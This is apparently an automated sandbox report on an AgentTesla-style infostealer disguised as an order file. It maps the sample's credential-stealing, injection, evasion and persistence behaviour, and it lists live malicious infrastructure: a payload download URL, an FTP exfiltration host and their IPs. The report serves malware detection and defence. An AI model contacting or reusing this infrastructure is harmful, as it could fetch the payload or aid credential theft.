                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7548, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Cbgoomiexw.exe PID: 7744, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7888, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Cbgoomiexw.exe PID: 8052, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 8124, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    1
                    Disable or Modify Tools
                    2
                    OS Credential Dumping
                    1
                    File and Directory Discovery
                    Remote Services11
                    Archive Collected Data
                    1
                    Ingress Tool Transfer
                    1
                    Exfiltration Over Alternative Protocol
                    Abuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job
                    1
                    Scheduled Task/Job
                    211
                    Process Injection
                    1
                    Deobfuscate/Decode Files or Information
                    1
                    Input Capture
                    24
                    System Information Discovery
                    Remote Desktop Protocol2
                    Data from Local System
                    11
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt1
                    Registry Run Keys / Startup Folder
                    1
                    Scheduled Task/Job
                    2
                    Obfuscated Files or Information
                    1
                    Credentials in Registry
                    1
                    Query Registry
                    SMB/Windows Admin Shares1
                    Email Collection
                    1
                    Non-Standard Port
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    Registry Run Keys / Startup Folder
                    2
                    Software Packing
                    NTDS311
                    Security Software Discovery
                    Distributed Component Object Model1
                    Input Capture
                    2
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading
                    LSA Secrets12
                    Virtualization/Sandbox Evasion
                    SSHKeylogging13
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading
                    Cached Domain Credentials1
                    Process Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                    Virtualization/Sandbox Evasion
                    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job211
                    Process Injection
                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1529729 Sample: GEFA-Order 232343-68983689.exe Startdate: 09/10/2024 Architecture: WINDOWS Score: 100 30 ftp.alternatifplastik.com 2->30 32 rubberpartsmanufacturers.com 2->32 46 Suricata IDS alerts for network traffic 2->46 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 12 other signatures 2->52 7 GEFA-Order 232343-68983689.exe 16 4 2->7         started        12 Cbgoomiexw.exe 14 2 2->12         started        14 Cbgoomiexw.exe 2 2->14         started        signatures3 process4 dnsIp5 34 rubberpartsmanufacturers.com 103.191.208.122, 443, 49730, 49735 AARNET-AS-APAustralianAcademicandResearchNetworkAARNe unknown 7->34 24 C:\Users\user\AppData\...\Cbgoomiexw.exe, PE32 7->24 dropped 26 C:\Users\...\Cbgoomiexw.exe:Zone.Identifier, ASCII 7->26 dropped 54 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->54 56 Writes to foreign memory regions 7->56 58 Injects a PE file into a foreign processes 7->58 16 InstallUtil.exe 14 2 7->16         started        60 Antivirus detection for dropped file 12->60 62 Multi AV Scanner detection for dropped file 12->62 64 Machine Learning detection for dropped file 12->64 20 InstallUtil.exe 2 12->20         started        22 InstallUtil.exe 14->22         started        file6 signatures7 process8 dnsIp9 28 ftp.alternatifplastik.com 5.2.84.236, 21, 49731, 49732 ALASTYRTR Turkey 16->28 36 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 16->36 38 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 22->38 40 Tries to steal Mail credentials (via file / registry access) 22->40 42 Tries to harvest and steal ftp login credentials 22->42 44 Tries to harvest and steal browser information (history, passwords, etc) 22->44 signatures10

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    GEFA-Order 232343-68983689.exe16%ReversingLabs
                    GEFA-Order 232343-68983689.exe26%VirustotalBrowse
                    GEFA-Order 232343-68983689.exe100%AviraHEUR/AGEN.1308518
                    GEFA-Order 232343-68983689.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\Cbgoomiexw.exe100%AviraHEUR/AGEN.1308518
                    C:\Users\user\AppData\Roaming\Cbgoomiexw.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\Cbgoomiexw.exe16%ReversingLabs
                    C:\Users\user\AppData\Roaming\Cbgoomiexw.exe26%VirustotalBrowse
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    ftp.alternatifplastik.com3%VirustotalBrowse
                    rubberpartsmanufacturers.com0%VirustotalBrowse
                    SourceDetectionScannerLabelLink
                    https://stackoverflow.com/q/14436606/233540%URL Reputationsafe
                    https://stackoverflow.com/q/14436606/233540%URL Reputationsafe
                    https://account.dyn.com/0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    https://stackoverflow.com/q/11564914/23354;0%URL Reputationsafe
                    https://stackoverflow.com/q/2152978/233540%URL Reputationsafe
                    https://rubberpartsmanufacturers.com/omani/Mrlres.mp30%VirustotalBrowse
                    https://github.com/mgravell/protobuf-neti0%VirustotalBrowse
                    http://ftp.alternatifplastik.com3%VirustotalBrowse
                    https://github.com/mgravell/protobuf-netJ0%VirustotalBrowse
                    https://rubberpartsmanufacturers.com0%VirustotalBrowse
                    https://github.com/mgravell/protobuf-net0%VirustotalBrowse
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    ftp.alternatifplastik.com
                    5.2.84.236
                    truetrueunknown
                    rubberpartsmanufacturers.com
                    103.191.208.122
                    truefalseunknown
                    NameMaliciousAntivirus DetectionReputation
                    https://rubberpartsmanufacturers.com/omani/Mrlres.mp3falseunknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://github.com/mgravell/protobuf-netGEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1735785966.0000000006E80000.00000004.08000000.00040000.00000000.sdmpfalseunknown
                    https://github.com/mgravell/protobuf-netiGEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1735785966.0000000006E80000.00000004.08000000.00040000.00000000.sdmpfalseunknown
                    https://stackoverflow.com/q/14436606/23354GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1735785966.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1716960379.00000000032AA000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000003.00000002.1881514343.000000000269A000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000007.00000002.1965310119.00000000030D3000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://account.dyn.com/GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004480000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1716960379.00000000034E2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.1879017395.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000003.00000002.1881514343.00000000028CC000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000003.00000002.1903361036.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000007.00000002.1996337104.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000007.00000002.1965310119.00000000031FE000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://github.com/mgravell/protobuf-netJGEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1735785966.0000000006E80000.00000004.08000000.00040000.00000000.sdmpfalseunknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameGEFA-Order 232343-68983689.exe, 00000000.00000002.1716960379.0000000003261000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.1884023773.0000000002F4E000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000003.00000002.1881514343.0000000002651000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.1966127439.00000000028D0000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000007.00000002.1965310119.0000000002FFC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2913625192.000000000330E000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://rubberpartsmanufacturers.comGEFA-Order 232343-68983689.exe, 00000000.00000002.1716960379.0000000003261000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000003.00000002.1881514343.0000000002651000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000007.00000002.1965310119.0000000002FFC000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    https://stackoverflow.com/q/11564914/23354;GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1735785966.0000000006E80000.00000004.08000000.00040000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://stackoverflow.com/q/2152978/23354GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1735785966.0000000006E80000.00000004.08000000.00040000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://ftp.alternatifplastik.comInstallUtil.exe, 00000001.00000002.1884023773.0000000002F5C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.1884023773.0000000002F4E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.1966127439.00000000028D0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.1966127439.00000000028DE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2913625192.000000000330E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2913625192.000000000331C000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    5.2.84.236
                    ftp.alternatifplastik.comTurkey
                    3188ALASTYRTRtrue
                    103.191.208.122
                    rubberpartsmanufacturers.comunknown
                    7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNefalse
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1529729
                    Start date and time:2024-10-09 10:50:07 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 8m 34s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:10
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:GEFA-Order 232343-68983689.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@9/2@2/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 97%
                    • Number of executed functions: 528
                    • Number of non-executed functions: 23
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    TimeTypeDescription
                    09:51:06AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Cbgoomiexw C:\Users\user\AppData\Roaming\Cbgoomiexw.exe
                    09:51:14AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Cbgoomiexw C:\Users\user\AppData\Roaming\Cbgoomiexw.exe
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    5.2.84.236Kuwait Offer48783929281-BZ2.exeGet hashmaliciousAgentTeslaBrowse
                      PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                        PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                          inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exeGet hashmaliciousAgentTeslaBrowse
                            PO_9876563647-FLOWTRONIX (FT)UUE.exeGet hashmaliciousAgentTeslaBrowse
                              Richardson Electronics, LTD. PRD10221301UUE.exeGet hashmaliciousAgentTeslaBrowse
                                PURCHASE ORDER ADDISON-6378397379UUE.exeGet hashmaliciousAgentTeslaBrowse
                                  Teklif-6205018797-6100052155-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                    Offer-CNVN-82927-VIETNAM.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      OFFER-876355- Hydraulic Partner, LLC.PDF..........................exeGet hashmaliciousAgentTeslaBrowse
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        ftp.alternatifplastik.comKuwait Offer48783929281-BZ2.exeGet hashmaliciousAgentTeslaBrowse
                                        • 5.2.84.236
                                        PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                        • 5.2.84.236
                                        PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                        • 5.2.84.236
                                        inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exeGet hashmaliciousAgentTeslaBrowse
                                        • 5.2.84.236
                                        PO_9876563647-FLOWTRONIX (FT)UUE.exeGet hashmaliciousAgentTeslaBrowse
                                        • 5.2.84.236
                                        Richardson Electronics, LTD. PRD10221301UUE.exeGet hashmaliciousAgentTeslaBrowse
                                        • 5.2.84.236
                                        PURCHASE ORDER ADDISON-6378397379UUE.exeGet hashmaliciousAgentTeslaBrowse
                                        • 5.2.84.236
                                        Teklif-6205018797-6100052155-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                        • 5.2.84.236
                                        Offer-CNVN-82927-VIETNAM.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 5.2.84.236
                                        OFFER-876355- Hydraulic Partner, LLC.PDF..........................exeGet hashmaliciousAgentTeslaBrowse
                                        • 5.2.84.236
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        ALASTYRTRKuwait Offer48783929281-BZ2.exeGet hashmaliciousAgentTeslaBrowse
                                        • 5.2.84.236
                                        PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                        • 5.2.84.236
                                        PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                        • 5.2.84.236
                                        inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exeGet hashmaliciousAgentTeslaBrowse
                                        • 5.2.84.236
                                        PO_9876563647-FLOWTRONIX (FT)UUE.exeGet hashmaliciousAgentTeslaBrowse
                                        • 5.2.84.236
                                        Richardson Electronics, LTD. PRD10221301UUE.exeGet hashmaliciousAgentTeslaBrowse
                                        • 5.2.84.236
                                        PURCHASE ORDER ADDISON-6378397379UUE.exeGet hashmaliciousAgentTeslaBrowse
                                        • 5.2.84.236
                                        Teklif-6205018797-6100052155-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                        • 5.2.84.236
                                        BROU_Copia de Pago_PDF.exeGet hashmaliciousUnknownBrowse
                                        • 5.2.84.221
                                        BROU_Copia de Pago_PDF.exeGet hashmaliciousUnknownBrowse
                                        • 5.2.84.221
                                        AARNET-AS-APAustralianAcademicandResearchNetworkAARNena.elfGet hashmaliciousMiraiBrowse
                                        • 103.33.73.172
                                        Remittance_Regulvar.htmGet hashmaliciousUnknownBrowse
                                        • 103.67.200.72
                                        2LgQzImW3E.elfGet hashmaliciousMiraiBrowse
                                        • 103.183.119.56
                                        Quote.exeGet hashmaliciousRemcosBrowse
                                        • 103.186.117.77
                                        f8fKadLyb4.elfGet hashmaliciousMiraiBrowse
                                        • 150.203.163.29
                                        zYJYK66EGb.exeGet hashmaliciousRemcosBrowse
                                        • 103.186.116.195
                                        na.elfGet hashmaliciousUnknownBrowse
                                        • 134.150.211.105
                                        na.elfGet hashmaliciousUnknownBrowse
                                        • 132.234.242.215
                                        DocuSign-Docx.pdfGet hashmaliciousUnknownBrowse
                                        • 103.67.200.72
                                        na.elfGet hashmaliciousGafgytBrowse
                                        • 103.14.48.192
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        3b5074b1b5d032e5620f69f9f700ff0eAgency Appointment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 103.191.208.122
                                        rShipmentNotification_.exeGet hashmaliciousAgentTeslaBrowse
                                        • 103.191.208.122
                                        AkIhFFUNs2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 103.191.208.122
                                        Jia Run-Full_Appointment_Letter_JRP-252432-1.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 103.191.208.122
                                        asegurar.vbsGet hashmaliciousUnknownBrowse
                                        • 103.191.208.122
                                        payment confirmation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                        • 103.191.208.122
                                        Payment attachment.exeGet hashmaliciousMassLogger RATBrowse
                                        • 103.191.208.122
                                        0001047757804_092024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 103.191.208.122
                                        ynwj.ps1Get hashmaliciousUnknownBrowse
                                        • 103.191.208.122
                                        fBcMVl6ns6.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                        • 103.191.208.122
                                        No context
                                        Process:C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):9728
                                        Entropy (8bit):4.987364829761206
                                        Encrypted:false
                                        SSDEEP:192:XNwfhPQWzJTuFZVFJ5pztwaqRI3INwEvRknn/cE7TSAl:9QpxTufjJ5pzt3Kw0Rkn0dA
                                        MD5:0C3D0B4CD6833A23EBC0687D97C64D73
                                        SHA1:41BAE7DF2F2544B207777C920429383A88745035
                                        SHA-256:F0FA4E57BE6D0AD0DEBBBB9189344A61896D0D38C6C9F2345D2421070E20389C
                                        SHA-512:DBF66BF2CB3B1124FA7F9F396C4B979388E6DFAE9CA2BEC6B6C792D6F5D4F23F8827330712419394EB1989654AF7F6D7CCD14C3FD8582870A7FA774207C80B80
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 16%
                                        • Antivirus: Virustotal, Detection: 26%, Browse
                                        Reputation:low
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.g.............................;... ...@....@.. ....................................`.................................`;..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................;......H........(..H............................................................s....&*b.(....(....(.....(....&*..(....r...po....r]..p .......o....&*Z(.....(....u....o....*....&&*...]&*.*".(5...&*..{....o7...r...p.{....o7...o8....X.#...(9...o:...&*Fr#..pr#..p(4...&*..0..`........(.....(.....(.....s....%r...po....%....s....o....}.....{...........s....o.....(.....{....o....*.0............8......X...2.*.0..<.........80....s......rq..po...........9.....o .........&......,..*............
                                        Process:C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:modified
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Reputation:high, very likely benign file
                                        Preview:[ZoneTransfer]....ZoneId=0
                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):4.987364829761206
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        • DOS Executable Generic (2002/1) 0.01%
                                        File name:GEFA-Order 232343-68983689.exe
                                        File size:9'728 bytes
                                        MD5:0c3d0b4cd6833a23ebc0687d97c64d73
                                        SHA1:41bae7df2f2544b207777c920429383a88745035
                                        SHA256:f0fa4e57be6d0ad0debbbb9189344a61896d0d38c6c9f2345d2421070e20389c
                                        SHA512:dbf66bf2cb3b1124fa7f9f396c4b979388e6dfae9ca2bec6b6c792d6f5d4f23f8827330712419394eb1989654af7f6d7ccd14c3fd8582870a7fa774207c80b80
                                        SSDEEP:192:XNwfhPQWzJTuFZVFJ5pztwaqRI3INwEvRknn/cE7TSAl:9QpxTufjJ5pzt3Kw0Rkn0dA
                                        TLSH:D1121911B7B8C633C8BE073194F7821013B4B2157852DBCC1DCD51DF9A12FA4A6A3796
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.g.............................;... ...@....@.. ....................................`................................
                                        Icon Hash:90cececece8e8eb0
                                        Entrypoint:0x403bae
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x670636CB [Wed Oct 9 07:54:51 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x3b600x4b.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x5b6.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x60000xc.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
